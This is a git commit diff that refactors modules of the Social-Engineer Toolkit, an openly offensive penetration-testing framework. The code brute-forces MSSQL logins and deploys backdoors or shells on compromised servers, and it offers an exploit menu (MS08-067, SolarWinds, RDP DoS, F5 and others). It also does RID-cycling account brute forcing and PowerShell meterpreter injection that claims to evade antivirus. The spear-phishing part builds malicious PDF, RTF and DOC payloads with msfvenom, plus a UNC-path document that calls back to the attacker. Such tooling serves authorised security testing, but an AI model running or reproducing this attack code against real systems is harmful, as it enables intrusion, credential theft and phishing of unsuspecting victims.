pep8 and python3 refactoring

This commit is contained in:
TrustedSec 2016-01-14 15:59:31 -05:00
parent 262fe6ffed
commit 723613f3ea
5 changed files with 457 additions and 344 deletions

View file

@ -33,49 +33,63 @@ try:
# take input here # take input here
attack_vector_sql = raw_input(setprompt(["19", "21"], "")) attack_vector_sql = raw_input(setprompt(["19", "21"], ""))
# #
# option 1 scan and attack, option 2 connect directly to mssql # option 1 scan and attack, option 2 connect directly to mssql
# if 1, start scan and attack # if 1, start scan and attack
# #
if attack_vector_sql == '1': if attack_vector_sql == '1':
print "\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n" print("\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n")
choice = raw_input(setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]")) choice = raw_input(
setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
if choice != "1": if choice != "1":
if choice != "2": if choice != "2":
if choice != "": if choice != "":
print_error("You did not specify 1 or 2! Please try again.") print_error(
choice =raw_input(setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]")) "You did not specify 1 or 2! Please try again.")
choice = raw_input(
setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
# grab ip address # grab ip address
if choice == "": choice = "1" if choice == "":
choice = "1"
if choice == "1": if choice == "1":
range = raw_input(setprompt(["19","21","22"], "Enter the CIDR or single IP (ex. 192.168.1.1/24)")) range = raw_input(setprompt(
["19", "21", "22"], "Enter the CIDR or single IP (ex. 192.168.1.1/24)"))
if choice == "2": if choice == "2":
while 1: while 1:
range = raw_input(setprompt(["19","21","22"], "Enter filename for SQL servers (ex. /root/sql.txt - note can be in format of ipaddr:port)")) range = raw_input(setprompt(
["19", "21", "22"], "Enter filename for SQL servers (ex. /root/sql.txt - note can be in format of ipaddr:port)"))
if not os.path.isfile(range): if not os.path.isfile(range):
print_error("File not found! Please type in the path to the file correctly.") print_error(
"File not found! Please type in the path to the file correctly.")
else: else:
break break
if choice == "1": port = "1433" if choice == "1":
if choice == "2": port = "1433" port = "1433"
if choice == "2":
port = "1433"
# ask for a wordlist # ask for a wordlist
wordlist = raw_input(setprompt(["19","21","22"], "Enter path to a wordlist file [use default wordlist]")) wordlist = raw_input(setprompt(
if wordlist == "": wordlist = "default" ["19", "21", "22"], "Enter path to a wordlist file [use default wordlist]"))
if wordlist == "":
wordlist = "default"
# specify the user to brute force # specify the user to brute force
username = raw_input(setprompt(["19","21","22"], "Enter the username to brute force or specify username file (/root/users.txt) [sa]")) username = raw_input(setprompt(
["19", "21", "22"], "Enter the username to brute force or specify username file (/root/users.txt) [sa]"))
# default to sa # default to sa
if username == "": username = "sa" if username == "":
username = "sa"
if username != "sa": if username != "sa":
if not os.path.isfile(username): if not os.path.isfile(username):
print_status("If you were using a file, its not found, using text as username.") print_status(
"If you were using a file, its not found, using text as username.")
# import the mssql module from fasttrack # import the mssql module from fasttrack
from src.fasttrack import mssql from src.fasttrack import mssql
# choice from earlier if we want to use a filelist or whatnot # choice from earlier if we want to use a filelist or whatnot
if choice != "2": if choice != "2":
# sql_servers # sql_servers
sql_servers = '' sql_servers = ''
print_status("Hunting for SQL servers.. This may take a little bit.") print_status(
"Hunting for SQL servers.. This may take a little bit.")
if "/" in str(range): if "/" in str(range):
iprange = printCIDR(range) iprange = printCIDR(range)
iprange = iprange.split(",") iprange = iprange.split(",")
@ -84,7 +98,8 @@ try:
if sqlport != None: if sqlport != None:
sql_servers = sql_servers + host + ":" + sqlport + "," sql_servers = sql_servers + host + ":" + sqlport + ","
else: else:
# use udp discovery to get the SQL server IDP through 1434 # use udp discovery to get the SQL server IDP through
# 1434
sqlport = get_sql_port(range) sqlport = get_sql_port(range)
# UDP could be closed - defaulting to 1433 # UDP could be closed - defaulting to 1433
if sqlport != None: if sqlport != None:
@ -94,10 +109,13 @@ try:
if choice == "2": if choice == "2":
if not os.path.isfile(range): if not os.path.isfile(range):
while 1: while 1:
print_warning("Sorry boss. The file was not found. Try again") print_warning(
range = raw_input(setprompt(["19","21", "22"], "Enter the CIDR, single, IP, or file with IP addresses (ex. 192.168.1.1/24)")) "Sorry boss. The file was not found. Try again")
range = raw_input(setprompt(
["19", "21", "22"], "Enter the CIDR, single, IP, or file with IP addresses (ex. 192.168.1.1/24)"))
if os.path.isfile(range): if os.path.isfile(range):
print_status("Atta boy. Found the file this time. Moving on.") print_status(
"Atta boy. Found the file this time. Moving on.")
break break
fileopen = file(range, "r").readlines() fileopen = file(range, "r").readlines()
@ -122,13 +140,17 @@ try:
# start loop and brute force # start loop and brute force
for servers in sql_servers: for servers in sql_servers:
# this will return the following format ipaddr + "," + username + "," + str(port) + "," + passwords # this will return the following format ipaddr + "," +
# username + "," + str(port) + "," + passwords
if servers != "": if servers != "":
# if we aren't using a username file # if we aren't using a username file
if not os.path.isfile(username): if not os.path.isfile(username):
sql_success = mssql.brute(servers, username, port, wordlist) sql_success = mssql.brute(
servers, username, port, wordlist)
if sql_success != False: if sql_success != False:
# after each success or fail it will break into this to the above with a newline to be parsed later # after each success or fail it will break
# into this to the above with a newline to
# be parsed later
master_list = master_list + sql_success + ":" master_list = master_list + sql_success + ":"
counter = 1 counter = 1
@ -136,16 +158,20 @@ try:
if os.path.isfile(username): if os.path.isfile(username):
for users in usernames: for users in usernames:
users = users.rstrip() users = users.rstrip()
sql_success = mssql.brute(servers, users, port, wordlist) sql_success = mssql.brute(
# we wont break out of the loop here incase theres multiple usernames we want to find servers, users, port, wordlist)
# we wont break out of the loop here incase
# theres multiple usernames we want to find
if sql_success != False: if sql_success != False:
master_list = master_list + sql_success + ":" master_list = master_list + sql_success + ":"
counter = 1 counter = 1
# if we didn't successful attack one # if we didn't successful attack one
if counter == 0: if counter == 0:
print_warning("Sorry. Unable to locate or fully compromise a MSSQL Server.") print_warning(
pause = raw_input("Press {return} to continue to the main menu.") "Sorry. Unable to locate or fully compromise a MSSQL Server.")
pause = raw_input(
"Press {return} to continue to the main menu.")
# if we successfully attacked one # if we successfully attacked one
if counter == 1: if counter == 1:
# need to loop to keep menu going # need to loop to keep menu going
@ -154,23 +180,29 @@ try:
counter = 1 counter = 1
# here we list the servers we compromised # here we list the servers we compromised
master_names = master_list.split(":") master_names = master_list.split(":")
print_status("Select the compromise SQL server you want to interact with:\n") print_status(
"Select the compromise SQL server you want to interact with:\n")
for success in master_names: for success in master_names:
if success != "": if success != "":
success = success.rstrip() success = success.rstrip()
success = success.split(",") success = success.split(",")
success= bcolors.BOLD + success[0] + bcolors.ENDC + " username: " + bcolors.BOLD + "%s" % (success[1]) + bcolors.ENDC + " | password: " + bcolors.BOLD + "%s" % (success[3]) + bcolors.ENDC + " SQLPort: " + bcolors.BOLD + "%s" % (success[2]) + bcolors.ENDC success = bcolors.BOLD + success[0] + bcolors.ENDC + " username: " + bcolors.BOLD + "%s" % (success[1]) + bcolors.ENDC + " | password: " + bcolors.BOLD + "%s" % (success[
print " " + str(counter) + ". " + success 3]) + bcolors.ENDC + " SQLPort: " + bcolors.BOLD + "%s" % (success[2]) + bcolors.ENDC
print(" " + str(counter) + ". " + success)
# increment counter # increment counter
counter = counter + 1 counter = counter + 1
print "\n 99. Return back to the main menu.\n" print("\n 99. Return back to the main menu.\n")
# select the server to interact with # select the server to interact with
select_server = raw_input(setprompt(["19","21","22"], "Select the SQL server to interact with [1]")) select_server = raw_input(
setprompt(["19", "21", "22"], "Select the SQL server to interact with [1]"))
# default 1 # default 1
if select_server == "quit" or select_server == "exit": break if select_server == "quit" or select_server == "exit":
if select_server == "": select_server = "1" break
if select_server == "99": break if select_server == "":
select_server = "1"
if select_server == "99":
break
counter = 1 counter = 1
for success in master_names: for success in master_names:
if success != "": if success != "":
@ -179,22 +211,30 @@ try:
# if we equal the number used above # if we equal the number used above
if counter == int(select_server): if counter == int(select_server):
# ipaddr + "," + username + "," + str(port) + "," + passwords # ipaddr + "," + username + "," + str(port) + "," + passwords
print "\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7,2008,2012) or just a shell\n\n 1. Deploy Backdoor to System\n 2. Standard Windows Shell\n\n 99. Return back to the main menu.\n" print("\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7,2008,2012) or just a shell\n\n 1. Deploy Backdoor to System\n 2. Standard Windows Shell\n\n 99. Return back to the main menu.\n")
option = raw_input(setprompt(["19","21","22"], "Which deployment option do you want [1]")) option = raw_input(
if option == "": option = "1" setprompt(["19", "21", "22"], "Which deployment option do you want [1]"))
if option == "":
option = "1"
# if 99 then break # if 99 then break
if option == "99": break if option == "99":
# specify we are using the fasttrack option, this disables some features break
filewrite = file(setdir + "/fasttrack.options", "w") # specify we are using the fasttrack
# option, this disables some features
filewrite = file(
setdir + "/fasttrack.options", "w")
filewrite.write("none") filewrite.write("none")
filewrite.close() filewrite.close()
# import fasttrack # import fasttrack
if option == "1": if option == "1":
# import payloads for selection and prep # import payloads for selection and
mssql.deploy_hex2binary(success[0], success[2], success[1], success[3]) # prep
mssql.deploy_hex2binary(
success[0], success[2], success[1], success[3])
# straight up connect # straight up connect
if option == "2": if option == "2":
mssql.cmdshell(success[0], success[2], success[1], success[3], option) mssql.cmdshell(success[0], success[2], success[
1], success[3], option)
# increment counter # increment counter
counter = counter + 1 counter = counter + 1
@ -202,51 +242,59 @@ try:
# if we want to connect directly to a SQL server # if we want to connect directly to a SQL server
# #
if attack_vector_sql == "2": if attack_vector_sql == "2":
sql_server = raw_input(setprompt(["19","21","23"], "Enter the hostname or IP address of the SQL server")) sql_server = raw_input(setprompt(
sql_port = raw_input(setprompt(["19","21","23"], "Enter the SQL port to connect [1433]")) ["19", "21", "23"], "Enter the hostname or IP address of the SQL server"))
if sql_port == "": sql_port = "1433" sql_port = raw_input(
sql_username = raw_input(setprompt(["19","21","23"], "Enter the username of the SQL Server [sa]")) setprompt(["19", "21", "23"], "Enter the SQL port to connect [1433]"))
if sql_port == "":
sql_port = "1433"
sql_username = raw_input(
setprompt(["19", "21", "23"], "Enter the username of the SQL Server [sa]"))
# default to sa # default to sa
if sql_username == "": sql_username = "sa" if sql_username == "":
sql_password = raw_input(setprompt(["19","21","23"], "Enter the password for the SQL server")) sql_username = "sa"
sql_password = raw_input(
setprompt(["19", "21", "23"], "Enter the password for the SQL server"))
print_status("Connecting to the SQL server...") print_status("Connecting to the SQL server...")
# try connecting # try connecting
# establish base counter for connection # establish base counter for connection
counter = 0 counter = 0
try: try:
import _mssql import _mssql
conn = _mssql.connect(sql_server + ":" + str(sql_port), sql_username, sql_password) conn = _mssql.connect(
sql_server + ":" + str(sql_port), sql_username, sql_password)
counter = 1 counter = 1
except Exception, e: except Exception as e:
print e print(e)
print_error("Connection to SQL Server failed. Try again.") print_error("Connection to SQL Server failed. Try again.")
# if we had a successful connection # if we had a successful connection
if counter == 1: if counter == 1:
print_status("Dropping into a SQL shell. Type quit to exit.") print_status(
"Dropping into a SQL shell. Type quit to exit.")
# loop forever # loop forever
while 1: while 1:
# enter the sql command # enter the sql command
sql_shell = raw_input("Enter your SQL command here: ") sql_shell = raw_input("Enter your SQL command here: ")
if sql_shell == "quit" or sql_shell == "exit": if sql_shell == "quit" or sql_shell == "exit":
print_status("Exiting the SQL shell and returning to menu.") print_status(
"Exiting the SQL shell and returning to menu.")
break break
try: try:
# execute the query # execute the query
sql_query = conn.execute_query(sql_shell) sql_query = conn.execute_query(sql_shell)
# return results # return results
print "\n" print("\n")
for data in conn: for data in conn:
data = str(data) data = str(data)
data = data.replace("\\n\\t", "\n") data = data.replace("\\n\\t", "\n")
data = data.replace("\\n", "\n") data = data.replace("\\n", "\n")
data = data.replace("{0: '", "") data = data.replace("{0: '", "")
data = data.replace("'}", "") data = data.replace("'}", "")
print data print(data)
except Exception, e: except Exception as e:
print_warning("\nIncorrect syntax somewhere. Printing error message: " + str(e)) print_warning(
"\nIncorrect syntax somewhere. Printing error message: " + str(e))
################################## ##################################
################################## ##################################
@ -255,36 +303,50 @@ try:
################################## ##################################
if attack_vector == "2": if attack_vector == "2":
# start the menu # start the menu
create_menu(text.fasttrack_exploits_text1, text.fasttrack_exploits_menu1) create_menu(text.fasttrack_exploits_text1,
text.fasttrack_exploits_menu1)
# enter the exploits menu here # enter the exploits menu here
range = raw_input(setprompt(["19","24"], "Select the number of the exploit you want")) range = raw_input(
setprompt(["19", "24"], "Select the number of the exploit you want"))
# ms08067 # ms08067
if range == "1": if range == "1":
try: reload(src.fasttrack.exploits.ms08067) try:
except: import src.fasttrack.exploits.ms08067 reload(src.fasttrack.exploits.ms08067)
except:
import src.fasttrack.exploits.ms08067
# firefox 3.6.16 # firefox 3.6.16
if range == "2": if range == "2":
try: reload(src.fasttrack.exploits.firefox_3_6_16) try:
except: import src.fasttrack.exploits.firefox_3_6_16 reload(src.fasttrack.exploits.firefox_3_6_16)
except:
import src.fasttrack.exploits.firefox_3_6_16
# solarwinds # solarwinds
if range == "3": if range == "3":
try: reload(src.fasttrack.exploits.solarwinds) try:
except: import src.fasttrack.exploits.solarwinds reload(src.fasttrack.exploits.solarwinds)
except:
import src.fasttrack.exploits.solarwinds
# rdp DoS # rdp DoS
if range == "4": if range == "4":
try: reload(src.fasttrack.exploits.rdpdos) try:
except: import src.fasttrack.exploits.rdpdos reload(src.fasttrack.exploits.rdpdos)
except:
import src.fasttrack.exploits.rdpdos
if range == "5": if range == "5":
try: reload(src.fasttrack.exploits.mysql_bypass) try:
except: import src.fasttrack.exploits.mysql_bypass reload(src.fasttrack.exploits.mysql_bypass)
except:
import src.fasttrack.exploits.mysql_bypass
if range == "6": if range == "6":
try: reload(src.fasttrack.exploits.f5) try:
except: import src.fasttrack.exploits.f5 reload(src.fasttrack.exploits.f5)
except:
import src.fasttrack.exploits.f5
################################## ##################################
################################## ##################################
@ -293,9 +355,10 @@ try:
################################## ##################################
if attack_vector == "3": if attack_vector == "3":
# load sccm attack # load sccm attack
try: reload(src.fasttrack.sccm.sccm_main) try:
except: import src.fasttrack.sccm.sccm_main reload(src.fasttrack.sccm.sccm_main)
except:
import src.fasttrack.sccm.sccm_main
################################## ##################################
################################## ##################################
@ -304,8 +367,8 @@ try:
################################## ##################################
if attack_vector == "4": if attack_vector == "4":
# load drac menu # load drac menu
subprocess.Popen("python %s/src/fasttrack/delldrac.py" % (definepath), shell=True).wait() subprocess.Popen("python %s/src/fasttrack/delldrac.py" %
(definepath), shell=True).wait()
################################## ##################################
################################## ##################################
@ -321,13 +384,16 @@ try:
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__| | _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|______| |______|
""") """)
print "\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want." print("\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want.")
print "\n" print("\n")
ipaddr = raw_input(setprompt(["31"], "Enter the IP address of server (or quit to exit)")) ipaddr = raw_input(
setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
if ipaddr == "99" or ipaddr == "quit" or ipaddr == "exit": if ipaddr == "99" or ipaddr == "quit" or ipaddr == "exit":
break break
print_status("Next you can automatically brute force the user accounts. If you do not want to brute force, type no at the next prompt") print_status(
dict = raw_input(setprompt(["31"], "Enter path to dictionary file to brute force [enter for built in]")) "Next you can automatically brute force the user accounts. If you do not want to brute force, type no at the next prompt")
dict = raw_input(setprompt(
["31"], "Enter path to dictionary file to brute force [enter for built in]"))
# if we are using the built in one # if we are using the built in one
if dict == "": if dict == "":
# write out a file # write out a file
@ -343,20 +409,29 @@ try:
dict = "" dict = ""
if dict != "": if dict != "":
print_warning("You are about to brute force user accounts, be careful for lockouts.") print_warning(
choice = raw_input(setprompt(["31"], "Are you sure you want to brute force [yes/no]")) "You are about to brute force user accounts, be careful for lockouts.")
choice = raw_input(
setprompt(["31"], "Are you sure you want to brute force [yes/no]"))
if choice.lower() == "n" or choice.lower() == "no": if choice.lower() == "n" or choice.lower() == "no":
print_status("Okay. Not brute forcing user accounts *phew*.") print_status(
"Okay. Not brute forcing user accounts *phew*.")
dict = "" dict = ""
# next we see what rid we want to start # next we see what rid we want to start
start_rid = raw_input(setprompt(["31"], "What RID do you want to start at [500]")) start_rid = raw_input(
if start_rid == "": start_rid = "500" setprompt(["31"], "What RID do you want to start at [500]"))
if start_rid == "":
start_rid = "500"
# stop rid # stop rid
stop_rid = raw_input(setprompt(["31"], "What RID do you want to stop at [15000]")) stop_rid = raw_input(
if stop_rid == "": stop_rid = "15000" setprompt(["31"], "What RID do you want to stop at [15000]"))
print_status("Launching RID_ENUM to start enumerating user accounts...") if stop_rid == "":
subprocess.Popen("python src/fasttrack/rid_enum.py %s %s %s %s" % (ipaddr,start_rid,stop_rid,dict), shell=True).wait() stop_rid = "15000"
print_status(
"Launching RID_ENUM to start enumerating user accounts...")
subprocess.Popen("python src/fasttrack/rid_enum.py %s %s %s %s" %
(ipaddr, start_rid, stop_rid, dict), shell=True).wait()
# once we are finished, prompt. # once we are finished, prompt.
print_status("Everything is finished!") print_status("Everything is finished!")
@ -368,9 +443,11 @@ try:
################################## ##################################
################################## ##################################
if attack_vector == "6": if attack_vector == "6":
print "\nPSEXEC Powershell Injection Attack:\n\nThis attack will inject a meterpreter backdoor through powershell memory injection. This will circumvent\nAnti-Virus since we will never touch disk. Will require Powershell to be installed on the remote victim\nmachine. You can use either straight passwords or hash values.\n" print("\nPSEXEC Powershell Injection Attack:\n\nThis attack will inject a meterpreter backdoor through powershell memory injection. This will circumvent\nAnti-Virus since we will never touch disk. Will require Powershell to be installed on the remote victim\nmachine. You can use either straight passwords or hash values.\n")
try: reload(src.fasttrack.psexec) try:
except: import src.fasttrack.psexec reload(src.fasttrack.psexec)
except:
import src.fasttrack.psexec
# handle keyboard exceptions # handle keyboard exceptions
except KeyboardInterrupt: except KeyboardInterrupt:

View file

@ -1,6 +1,6 @@
#!/usr/bin/env python #!/usr/bin/env python
## module_handler.py # module_handler.py
import glob import glob
import re import re
@ -14,9 +14,10 @@ menu_return = "false"
counter = 0 counter = 0
# get the menu going # get the menu going
print "\n" print("\n")
print_info_spaces("Social-Engineer Toolkit Third Party Modules menu.") print_info_spaces("Social-Engineer Toolkit Third Party Modules menu.")
print_info_spaces("Please read the readme/modules.txt for information on how to create your own modules.\n") print_info_spaces(
"Please read the readme/modules.txt for information on how to create your own modules.\n")
for name in glob.glob("modules/*.py"): for name in glob.glob("modules/*.py"):
@ -30,9 +31,9 @@ for name in glob.glob("modules/*.py"):
line = line.replace('MAIN="', "") line = line.replace('MAIN="', "")
line = line.replace('"', "") line = line.replace('"', "")
line = " " + str(counter) + ". " + line line = " " + str(counter) + ". " + line
print line print(line)
print "\n 99. Return to the previous menu\n" print("\n 99. Return to the previous menu\n")
choice = raw_input(setprompt(["9"], "")) choice = raw_input(setprompt(["9"], ""))
if choice == 'exit': if choice == 'exit':
@ -76,6 +77,6 @@ if menu_return == "false":
try: try:
exec("%s.main()" % (name)) exec("%s.main()" % (name))
# handle the exception if main isn't there # handle the exception if main isn't there
except Exception, e: except Exception as e:
raw_input(" [!] There was an issue with a module: %s." % (e)) raw_input(" [!] There was an issue with a module: %s." % (e))
return_continue() return_continue()

View file

@ -1,5 +1,5 @@
#!/usr/bin/python #!/usr/bin/python
## PDF spear phishing attack here # PDF spear phishing attack here
import subprocess import subprocess
import re import re
@ -20,7 +20,7 @@ users_home = os.getenv("HOME")
# metasploit path # metasploit path
meta_path = meta_path() meta_path = meta_path()
print meta_path print(meta_path)
# define if we need apache or not for dll hijacking # define if we need apache or not for dll hijacking
# define if use apache or not # define if use apache or not
@ -44,7 +44,8 @@ for line in apache_check:
line2 = line2.rstrip() line2 = line2.rstrip()
apache_path = line2.replace("APACHE_DIRECTORY=", "") apache_path = line2.replace("APACHE_DIRECTORY=", "")
apache = 1 apache = 1
if os.path.isdir(apache_path + "/html"): apache_path = apache_path + "/html" if os.path.isdir(apache_path + "/html"):
apache_path = apache_path + "/html"
################################################### ###################################################
# USER INPUT: SHOW PAYLOAD MENU # # USER INPUT: SHOW PAYLOAD MENU #
@ -54,9 +55,10 @@ target=""
exploit = "INVALID" exploit = "INVALID"
while exploit == "INVALID": while exploit == "INVALID":
debug_msg(me, "printing 'src.core.menu.text.create_payloads_menu'", 5) debug_msg(me, "printing 'src.core.menu.text.create_payloads_menu'", 5)
show_payload_menu1 = create_menu(create_payloads_text, create_payloads_menu) show_payload_menu1 = create_menu(
create_payloads_text, create_payloads_menu)
exploit = raw_input(setprompt(["4"], "")) exploit = raw_input(setprompt(["4"], ""))
print "\n" print("\n")
# Do conditional checks for the value of 'exploit', which should be a number # Do conditional checks for the value of 'exploit', which should be a number
# Handle any additional tasks before doing the dictionary lookup and # Handle any additional tasks before doing the dictionary lookup and
@ -67,12 +69,14 @@ while exploit == "INVALID":
exit_set() exit_set()
if exploit == "": if exploit == "":
exploit='1' # 'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)' # 'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)'
exploit = '1'
if exploit == '3': # 'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow' if exploit == '3': # 'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow'
outfile = ("template.doc") outfile = ("template.doc")
if exploit == '4': #'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)' # 'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)'
if exploit == '4':
outfile = ("template.rtf") outfile = ("template.rtf")
target = ("TARGET=1") target = ("TARGET=1")
@ -82,22 +86,23 @@ while exploit == "INVALID":
if exploit != '3' and exploit != '4' and exploit != "17": if exploit != '3' and exploit != '4' and exploit != "17":
outfile = ("template.pdf") outfile = ("template.pdf")
debug_msg(me, 'current input was read as: %s' % exploit, 3) debug_msg(me, 'current input was read as: %s' % exploit, 3)
exploit = ms_attacks(exploit) exploit = ms_attacks(exploit)
debug_msg(me, 'value was translated to: %s' % exploit, 3) debug_msg(me, 'value was translated to: %s' % exploit, 3)
if exploit == "INVALID": if exploit == "INVALID":
print_warning("that choice is invalid...please try again or press ctrl-c to Cancel.") print_warning(
"that choice is invalid...please try again or press ctrl-c to Cancel.")
time.sleep(2) time.sleep(2)
# 'exploit' has been converted to the string by now, so we need to # 'exploit' has been converted to the string by now, so we need to
# evaluate the string instead of the user input number from here on... # evaluate the string instead of the user input number from here on...
if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs": if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs":
print_info("Default payload creation selected. SET will generate a normal PDF with embedded EXE.") print_info(
print """ "Default payload creation selected. SET will generate a normal PDF with embedded EXE.")
print("""
1. Use your own PDF for attack 1. Use your own PDF for attack
2. Use built-in BLANK PDF for attack\n""" 2. Use built-in BLANK PDF for attack\n""")
choicepdf = raw_input(setprompt(["4"], "")) choicepdf = raw_input(setprompt(["4"], ""))
@ -106,7 +111,8 @@ if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit ==
if choicepdf == '1': if choicepdf == '1':
# define if user wants to use their own pdf or built in one # define if user wants to use their own pdf or built in one
inputpdf=raw_input(setprompt(["4"], "Enter path to your pdf [blank-builtin]")) inputpdf = raw_input(
setprompt(["4"], "Enter path to your pdf [blank-builtin]"))
# if blank, then default to normal pdf # if blank, then default to normal pdf
if inputpdf == "": if inputpdf == "":
# change to default SET pdf # change to default SET pdf
@ -141,13 +147,13 @@ if exploit_counter == 0:
if payload == 'exit': if payload == 'exit':
exit_set() exit_set()
if payload == "" : payload="2" if payload == "":
payload = "2"
if payload == '4' or payload == '5' or payload == '6': if payload == '4' or payload == '5' or payload == '6':
noencode = 1 noencode = 1
payload = ms_payload_3(payload) payload = ms_payload_3(payload)
# imported from central, grabs ip address # imported from central, grabs ip address
rhost = grab_ipaddress() rhost = grab_ipaddress()
@ -179,18 +185,22 @@ if exploit_counter == 0:
os.remove(msfpath + "local/template.pdf") os.remove(msfpath + "local/template.pdf")
filewrite = file(setdir + "/template.rc", "w") filewrite = file(setdir + "/template.rc", "w")
filewrite.write("use exploit/windows/fileformat/adobe_pdf_embedded_exe\nset LHOST %s\nset LPORT %s\nset INFILENAME %s\nset FILENAME %s\nexploit\n" % (rhost,lport,inputpdf,output)) filewrite.write("use exploit/windows/fileformat/adobe_pdf_embedded_exe\nset LHOST %s\nset LPORT %s\nset INFILENAME %s\nset FILENAME %s\nexploit\n" %
(rhost, lport, inputpdf, output))
filewrite.close() filewrite.close()
child = pexpect.spawn("%smsfconsole -r %s/template.rc" % (meta_path, setdir)) child = pexpect.spawn(
"%smsfconsole -r %s/template.rc" % (meta_path, setdir))
a = 1 a = 1
while a == 1: while a == 1:
if os.path.isfile(setdir + "/template.pdf"): if os.path.isfile(setdir + "/template.pdf"):
subprocess.Popen("cp " + msfpath + "local/%s %s" % (filename_code, setdir), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True) subprocess.Popen("cp " + msfpath + "local/%s %s" % (filename_code, setdir),
stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
a = 2 # break a = 2 # break
else: else:
print_status("Waiting for payload generation to complete...") print_status("Waiting for payload generation to complete...")
if os.path.isfile(msfpath + "local/" + outfile): if os.path.isfile(msfpath + "local/" + outfile):
subprocess.Popen("cp %slocal/%s %s" % (msfpath, outfile,setdir), shell=True) subprocess.Popen("cp %slocal/%s %s" %
(msfpath, outfile, setdir), shell=True)
time.sleep(3) time.sleep(3)
print_status("Payload creation complete.") print_status("Payload creation complete.")
@ -205,13 +215,17 @@ if exploit_counter == 0:
if noencode == 1: if noencode == 1:
execute1 = ("exe") execute1 = ("exe")
payloadname = ("vb.exe") payloadname = ("vb.exe")
subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" % (meta_path,payload,rhost,lport,execute1,setdir,payloadname), shell=True) subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" %
(meta_path, payload, rhost, lport, execute1, setdir, payloadname), shell=True)
if noencode == 0: if noencode == 0:
subprocess.Popen("%smsfvenom -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" % (meta_path,setdir,setdir), shell=True) subprocess.Popen("%smsfvenom -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" %
(meta_path, setdir, setdir), shell=True)
# Create the VB script here # Create the VB script here
subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" % (meta_path,setdir,setdir), shell=True) subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" %
(meta_path, setdir, setdir), shell=True)
print_info("Raring the VBS file.") print_info("Raring the VBS file.")
subprocess.Popen("rar a %s/template.rar %s/template.vbs" % (setdir,setdir), shell=True) subprocess.Popen("rar a %s/template.rar %s/template.vbs" %
(setdir, setdir), shell=True)
# NEED THIS TO PARSE DELIVERY OPTIONS TO SMTP MAILER # NEED THIS TO PARSE DELIVERY OPTIONS TO SMTP MAILER
filewrite = file(setdir + "/payload.options", "w") filewrite = file(setdir + "/payload.options", "w")
@ -221,13 +235,17 @@ if exploit_counter == 0:
if not os.path.isfile(setdir + "/fileformat.file"): if not os.path.isfile(setdir + "/fileformat.file"):
sys.path.append("src/phishing/smtp/client/") sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1) debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
try: reload(smtp_client) try:
except: import smtp_client reload(smtp_client)
except:
import smtp_client
# start the unc_embed attack stuff here # start the unc_embed attack stuff here
if exploit == "unc_embed": if exploit == "unc_embed":
rhost = grab_ipaddress rhost = grab_ipaddress
import string,random import string
import random
def random_string(minlength=6, maxlength=15): def random_string(minlength=6, maxlength=15):
length = random.randint(minlength, maxlength) length = random.randint(minlength, maxlength)
letters = string.ascii_letters + string.digits letters = string.ascii_letters + string.digits
@ -238,24 +256,31 @@ if exploit == "unc_embed":
filewrite.write("exploit -j\r\n\r\n") filewrite.write("exploit -j\r\n\r\n")
filewrite.close() filewrite.close()
filewrite = file(setdir + "/template.doc", "w") filewrite = file(setdir + "/template.doc", "w")
filewrite.write(r'''<html><head></head><body><img src="file://\\%s\%s.jpeg">''' %(rhost,rand_gen)) filewrite.write(
r'''<html><head></head><body><img src="file://\\%s\%s.jpeg">''' % (rhost, rand_gen))
filewrite.close() filewrite.close()
sys.path.append("src/phishing/smtp/client/") sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1) debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
try: reload(smtp_client) try:
